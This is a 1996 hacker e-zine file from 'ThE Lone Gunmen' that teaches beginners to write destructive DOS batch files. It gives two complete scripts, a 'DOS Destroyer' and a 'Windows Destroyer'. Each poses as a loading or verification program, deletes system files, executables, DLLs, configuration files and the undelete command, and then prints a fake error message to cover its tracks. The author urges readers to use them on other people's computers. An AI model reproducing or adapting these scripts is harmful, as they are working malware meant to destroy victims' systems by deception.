______________ | ___ ___ | | |_ | | _| | ______ ______ |___| | | |___| |_ _| / \ | | | | | /----\/ | | | | | | | | | | | | ___ | | | | __ | | <_ | Issue #:068 _| |_ _| |_| | | \___/ | Date:07/16/96 |______| () |_________| () \________/ () _ / / \ \ _ / _ / ThE LONE GUNMEN Presents: \ _ \ | | | | | | Batch Virii & Batch Bombs | | | | Written By: Dark Raven | | | | | | | | | | | \____________________________________/ | \________________________________________/ ********************************STOP****************************************** *** In this day and age, anyone can get there hands on text philez and that*** *** means that even the yuppie kids, who don't follow directions, can (and *** *** will probably blow there faces,hands,fingers,noses,legs,nipples,and P-P*** *** blown off, so before you continue read the File "DISCLAIMER!" that was *** *** included in the .ZIP file. it basicly says that you cant sew me if you *** *** get fucked. ************************************************************** ****************************************************************************** This file is directed to anybody who is interested in virill things but doesn't know how to code. A Batch Bomb or Batch Virii are simply put as batch files that will fuck someone's system up. To make a batch bomb you need to have some mild knowledge of DOS commands. The more Dos commands you know the better your batch bomb will be. Batch bombs are basicaly constructed in your DOS editor but I guess you could write them in any program you can save in a .bat extension. I have included some simple batch bombs in this text file and must warn you that if you type them up be carefull you could fuck your own system up. These batch bombs have been tested on my system (very carefully) and worked to there intent. My system is running windows in its default directory C:\WINDOWS and dos is in its default directory C:\DOS now if someone you are going to bomb has other than my defaults you will have to modify these files to compensate the changes. Ok here we go: DOS DESTROYER : TESTED WITH DOS 6.20 @echo Please wait program is loading..... @echo off c: cd\ del autoexec.* del config.* cd dos del *.com del *.exe del *.sys cd\ @echo on @echo Error in address 003580:1315 @echo Program unable to load. This DOS destroyer should work on most systems but you can make it do more if you know more on the persons sytem.. You can get creative with all the echoed text.. WINDOWS DESTROYER @echo Windows 3.1 file verification system.. Please wait system checking in progress @echo off c: cd\ cd windows del *.exe del *.com del *.hlp del *.ini del *.grp cd system del *.dll cd\ cd dos del undelete.* cd\ @echo on @echo Error in program.. Memory address 12306:0005. Same as the DOS destroyer this windows destroyer could be made better if you know more about the persons system and again this should work on all Windows computers running DOS 5.0 or higher (tested on 6.20). In a different form than DOS destroyer Windows destroyer deletes the undelete command making life more fun. These are just a couple of examples you can combine the two or make one designed for a specific persons sytem.. Well thats all.. A very simple text file on very simple batch virii for beginners.. By Dark Raven... dedicated member of TlG and loyal member of The X-Philes BBS... A special thanks issued to Dark Ritual for a little inspiration of creating a simple file for beginners to the H/P/A/V area.. C-Yah L8r... Dr SAUCE00Batch Virii & Batch Bombs Dark Raven ThE Lone Gunmen[TlG]19960716Pi